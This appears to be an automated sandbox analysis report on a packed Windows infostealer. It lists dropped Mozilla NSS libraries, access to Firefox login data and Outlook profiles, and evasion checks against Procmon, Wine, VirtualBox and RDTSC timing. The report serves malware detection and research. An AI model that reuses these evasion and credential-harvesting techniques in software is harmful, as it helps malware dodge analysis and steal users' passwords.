Source: file.exe, 00000000.00000003.1913392897.00000000294D8000.00000004.00000020.00020000.00000000.sdmp, HCFIJKKKKKFCAAAAFBKFIECAAK.0.dr	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: file.exe, 00000000.00000002.1950016407.00000000003BA000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/ZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBM
Source: file.exe, 00000000.00000002.1950016407.00000000003BA000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/lvYnwxfDB8MHxMYXN0UGFzc3xoZG9raWVqbnBpbWFrZWRoYWpoZGxj
Source: HCFIJKKKKKFCAAAAFBKFIECAAK.0.dr	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: file.exe, 00000000.00000002.1950016407.00000000003BA000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: file.exe, 00000000.00000003.1913392897.00000000294D8000.00000004.00000020.00020000.00000000.sdmp, HCFIJKKKKKFCAAAAFBKFIECAAK.0.dr	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

System Summary

PE file contains section with special chars

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .rsrc
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00729172	0_2_00729172
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005F29A9	0_2_005F29A9
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007A82EC	0_2_007A82EC
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00701AD2	0_2_00701AD2
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0066CAC9	0_2_0066CAC9
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00733372	0_2_00733372
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00650B7E	0_2_00650B7E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00725B36	0_2_00725B36
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007353B8	0_2_007353B8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00738394	0_2_00738394
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0072ACB5	0_2_0072ACB5
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0068ADBD	0_2_0068ADBD
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00727645	0_2_00727645
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0072C6F0	0_2_0072C6F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0081065A	0_2_0081065A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00690E9A	0_2_00690E9A

Source: C:\Users\user\Desktop\file.exe

Code function: String function: 003645C0 appears 316 times

Source: file.exe, 00000000.00000002.1971795139.000000006F902000.00000002.00000001.01000000.00000008.sdmp	Binary or memory string: OriginalFilenamemozglue.dll0 vs file.exe
Source: file.exe, 00000000.00000002.1971667295.000000006C865000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: OriginalFilenamenss3.dll0 vs file.exe

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: file.exe

Static PE information: Section: ffngccge ZLIB complexity 0.9948113118587809

Source: file.exe

Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5

Source: file.exe, 00000000.00000003.1723190481.0000000004CD0000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1950016407.0000000000361000.00000040.00000001.01000000.00000003.sdmp

Binary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@1/22@0/1

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00379600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,

0_2_00379600

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00373720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,

0_2_00373720

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\79VKF1XS.htm

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: file.exe, 00000000.00000002.1963134690.000000001D43D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1971319713.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1971588338.000000006C81F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: file.exe, 00000000.00000002.1963134690.000000001D43D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1971319713.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1971588338.000000006C81F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: file.exe, 00000000.00000002.1963134690.000000001D43D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1971319713.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1971588338.000000006C81F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: file.exe, 00000000.00000002.1963134690.000000001D43D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1971319713.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1971588338.000000006C81F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: file.exe, 00000000.00000002.1963134690.000000001D43D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1971319713.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1971588338.000000006C81F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: file.exe, 00000000.00000002.1963134690.000000001D43D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1971319713.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: file.exe, 00000000.00000002.1963134690.000000001D43D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1971319713.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1971588338.000000006C81F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: file.exe, 00000000.00000003.1823420841.000000001D334000.00000004.00000020.00020000.00000000.sdmp, HIDGCFBFBFBKEBGCAFCG.0.dr	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: file.exe, 00000000.00000002.1963134690.000000001D43D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1971319713.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: file.exe, 00000000.00000002.1963134690.000000001D43D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1971319713.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;

Source: file.exe	String found in binary or memory: ft.com/en-us/office/examples-of-office-product-keys-7d48285b-20e8-4b9b-91ad-216e34163bad?wt.mc_id=enterpk2016&ui=en-us&rs=en-us&ad=us https://support.microsoft.com/en-us/topic/install-the-english-language-pack-for-32-bit-office-94ba2e0b-638e-4a92-8857-2cb5ac1d
Source: file.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: file.exe	String found in binary or memory: m/en-us/office/examples-of-office-product-keys-7d48285b-20e8-4b9b-91ad-216e34163bad?wt.mc_id=enterpk2016&ui=en-us&rs=en-us&ad=us https://support.microsoft.com/en-us/topic/install-the-english-language-pack-for-32-bit-office-94ba2e0b-638e-4a92-8857-2cb5ac1d8e17?

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mozglue.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: vcruntime140.dll	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001

Jump to behavior

Source: file.exe

Static file information: File size 1852928 > 1048576

Source: file.exe

Static PE information: Raw size of ffngccge is bigger than: 0x100000 < 0x19e400

Source:	Binary string: mozglue.pdbP source: file.exe, 00000000.00000002.1971760211.000000006F8ED000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source:	Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source:	Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source:	Binary string: nss3.pdb@ source: file.exe, 00000000.00000002.1971588338.000000006C81F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source:	Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source:	Binary string: nss3.pdb source: file.exe, 00000000.00000002.1971588338.000000006C81F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source:	Binary string: mozglue.pdb source: file.exe, 00000000.00000002.1971760211.000000006F8ED000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source:	Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\file.exe

Unpacked PE file: 0.2.file.exe.360000.0.unpack :EW;.rsrc :W;.idata :W; :EW;ffngccge:EW;atmmyeyl:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;ffngccge:EW;atmmyeyl:EW;.taggant:EW;

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00379860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_00379860

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: file.exe

Static PE information: real checksum: 0x1c8855 should be: 0x1d2705

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .rsrc
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: ffngccge
Source: file.exe	Static PE information: section name: atmmyeyl
Source: file.exe	Static PE information: section name: .taggant
Source: msvcp140[1].dll.0.dr	Static PE information: section name: .didat
Source: nss3.dll.0.dr	Static PE information: section name: .00cfg
Source: nss3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: softokn3.dll.0.dr	Static PE information: section name: .00cfg
Source: softokn3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: freebl3.dll.0.dr	Static PE information: section name: .00cfg
Source: freebl3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: mozglue.dll.0.dr	Static PE information: section name: .00cfg
Source: mozglue[1].dll.0.dr	Static PE information: section name: .00cfg
Source: msvcp140.dll.0.dr	Static PE information: section name: .didat

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0037B035 push ecx; ret	0_2_0037B048
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007BD872 push 1F99EF56h; mov dword ptr [esp], esi	0_2_007BD880
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00804097 push esi; mov dword ptr [esp], 3DC1DA69h	0_2_008040BC
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00804097 push ebx; mov dword ptr [esp], 1091C749h	0_2_0080413C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_008258AD push 51454C5Eh; mov dword ptr [esp], esi	0_2_008259CD
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_008158C5 push 52283F77h; mov dword ptr [esp], ecx	0_2_00815B1E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007D6829 push eax; mov dword ptr [esp], esi	0_2_007D6845
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007C7015 push ecx; mov dword ptr [esp], 012D8B74h	0_2_007C706C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007A700F push 4929FCB3h; mov dword ptr [esp], ebx	0_2_007A705B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00805016 push edi; mov dword ptr [esp], 36DDD6E2h	0_2_0080502E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007E58DA push ebp; mov dword ptr [esp], esi	0_2_007E58F1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0079C883 push ecx; mov dword ptr [esp], ebx	0_2_0079C90F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0080B07F push 7445DAF7h; mov dword ptr [esp], eax	0_2_0080B09D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00729172 push 6F2D7059h; mov dword ptr [esp], ecx	0_2_00729183
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00729172 push ebp; mov dword ptr [esp], 0E9DCB00h	0_2_00729187
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00729172 push 1C4025EFh; mov dword ptr [esp], ecx	0_2_007291AA
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00729172 push 242E0ED4h; mov dword ptr [esp], ebx	0_2_007291BD
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00729172 push 67E067AFh; mov dword ptr [esp], ebx	0_2_007291D6
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00729172 push 6DD7D375h; mov dword ptr [esp], ebx	0_2_00729309
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00729172 push 3EF0CF60h; mov dword ptr [esp], edi	0_2_00729332
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00729172 push edi; mov dword ptr [esp], ecx	0_2_00729349
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00729172 push edx; mov dword ptr [esp], 77FF1AFDh	0_2_00729364
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00729172 push 52D79975h; mov dword ptr [esp], eax	0_2_007293F5
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00729172 push eax; mov dword ptr [esp], edx	0_2_0072948C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00729172 push edx; mov dword ptr [esp], 23CBC0B2h	0_2_007294B8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00729172 push ecx; mov dword ptr [esp], esi	0_2_00729581
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00729172 push esi; mov dword ptr [esp], 4805A273h	0_2_007295FD
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00729172 push esi; mov dword ptr [esp], edx	0_2_00729671
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00729172 push 76E16E2Dh; mov dword ptr [esp], ebx	0_2_0072971E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00729172 push esi; mov dword ptr [esp], 7FEF4A2Eh	0_2_00729722
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00729172 push eax; mov dword ptr [esp], ecx	0_2_0072974E

Source: file.exe

Static PE information: section name: ffngccge entropy: 7.954195447661275

Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Regmonclass	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

0_2_00379860

Malware Analysis System Evasion

Found evasive API chain (may stop execution after checking locale)

Source: C:\Users\user\Desktop\file.exe

Evasive API call chain: GetUserDefaultLangID, ExitProcess

graph_0-13548

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_CURRENT_USER\Software\Wine			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__			Jump to behavior

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5C1F38 second address: 5C1F3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5C1F3C second address: 5C1F40 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5C1F40 second address: 5C1F56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jc 00007FEFB8B6DE5Ch 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 728BE1 second address: 728C0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FEFB9679B56h 0x0000000a js 00007FEFB9679B56h 0x00000010 popad 0x00000011 pushad 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 jmp 00007FEFB9679B65h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 74069A second address: 74069E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 740834 second address: 740851 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push edi 0x00000006 jmp 00007FEFB9679B61h 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e pop edx 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 740C2B second address: 740C2F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 740C2F second address: 740C35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 740C35 second address: 740C3A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 742880 second address: 74288A instructions: 0x00000000 rdtsc 0x00000002 jng 00007FEFB9679B56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 742A02 second address: 742A06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 742A06 second address: 742A0F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
